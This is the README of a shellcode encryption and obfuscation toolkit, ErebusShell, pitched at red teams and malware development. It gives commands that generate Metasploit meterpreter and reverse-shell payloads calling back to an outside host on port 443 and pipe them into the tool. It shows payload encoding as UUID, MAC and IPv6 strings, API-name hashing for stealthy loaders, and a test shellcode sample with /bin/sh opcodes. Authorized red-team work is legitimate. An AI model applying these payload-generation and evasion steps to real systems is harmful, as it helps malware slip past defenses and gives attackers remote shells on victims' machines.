ErebusShell

ErebusShell is a shellcode encryption and obfuscation toolkit for red team operations and malware development research. It supports various encryption algorithms, obfuscation methods, and output formats, with integration for tools like Metasploit and Cobalt Strike.

Installation

Requirements

• Python 3.8 or higher
• cryptography library (for AES and ChaCha20)

Steps

1. Clone the repository:

   git clone https://github.com/1x0DF0/ErebusShell
   cd ErebusShell
   

2. Install dependencies:

   pip install cryptography
   

3. On Linux or Mac, make the script executable:

   chmod +x erebusshell.py
   

Usage

Run the tool with python erebusshell.py <command> [options].

Basic Encryption

To encrypt a shellcode file:

python erebusshell.py encrypt payload.bin xor -o encrypted.bin

For RC4 with a custom key:

python erebusshell.py encrypt payload.bin rc4 --key deadbeef12345678

For AES-CBC:

python erebusshell.py encrypt payload.bin aes_cbc -o encrypted.aes

Generating and Encrypting Metasploit Payload

1. Generate the payload:

   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin
   

2. Encrypt it:

   python erebusshell.py encrypt payload.bin layered --save-metadata -o encrypted.bin
   

3. Output as C array:

   python erebusshell.py encrypt payload.bin rc4 -f c > shellcode.h
   

Obfuscation

For UUID format:

python erebusshell.py encrypt payload.bin uuid -o uuids.txt

For MAC address format:

python erebusshell.py encrypt payload.bin mac

For IPv6 format:

python erebusshell.py encrypt payload.bin ipv6 -o ipv6_list.txt

API Hash Generation

Create a file with API names (e.g., apis.txt):

kernel32.dll
ntdll.dll
VirtualAlloc
VirtualProtect
CreateThread

Generate hashes:

python erebusshell.py hash --api-file apis.txt -o api_hashes.h

Command Reference

Encrypt

python erebusshell.py encrypt [OPTIONS] INPUT METHOD

• INPUT: Input shellcode file
• METHOD: Encryption method (e.g., xor, rc4, aes_cbc)
• Options:
  • -o, --output FILE: Output file
  • -f, --format FORMAT: Output format (c, python, raw, etc.)
  • -k, --key HEX: Use specific key (hex)
  • --key-size INT: Key size in bytes (default: 16)
  • --readable-key: Generate ASCII readable key
  • --compress: Compress before encryption
  • --var-name NAME: Variable name for array output
  • --key-id ID: Identifier to store key
  • --save-metadata: Save metadata to JSON

Hash

python erebusshell.py hash [OPTIONS]

• Options:
  • --api-file FILE: File containing API names
  • --hash-algorithm ALGO: Algorithm (djb2, ror13, fnv1a)
  • -o, --output FILE: Output header file

Features

• Encryption: XOR, XOR with feedback, RC4, AES-CBC/CTR, ChaCha20, custom Feistel, layered
• Obfuscation: MAC addresses, IPv4/IPv6, UUID, Base64/Base85, hex
• Output: C arrays, C# arrays, Python arrays, PowerShell arrays, raw binary, Base64/hex strings
• Other: Key management, entropy calculation, optional compression, API hash generation, metadata export

Integration with C2 Frameworks

Metasploit

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=443 -f raw | python erebusshell.py encrypt /dev/stdin rc4 -o encrypted.bin

Cobalt Strike and Empire

Encrypt exported payloads similarly, e.g.:

python erebusshell.py encrypt beacon.bin layered --save-metadata -o beacon_encrypted.bin

Security Notes

• Store keys securely and use unique keys per operation.
• Test decryption before use.
• For high security, use layered encryption.

Testing

Create a test file:

shellcode = b'\x90' * 100  # NOP sled
shellcode += b'\x31\xc0\x50\x68\x2f\x2f\x73\x68'  # Example opcodes
with open('test.bin', 'wb') as f:
    f.write(shellcode)

Encrypt:

python erebusshell.py encrypt test.bin xor --save-metadata

Contributing

Contributions are welcome via pull requests or issues.

License

MIT License - see the LICENSE file.

Disclaimer

This tool is for educational and authorized security testing only. Comply with all laws; authors are not liable for misuse.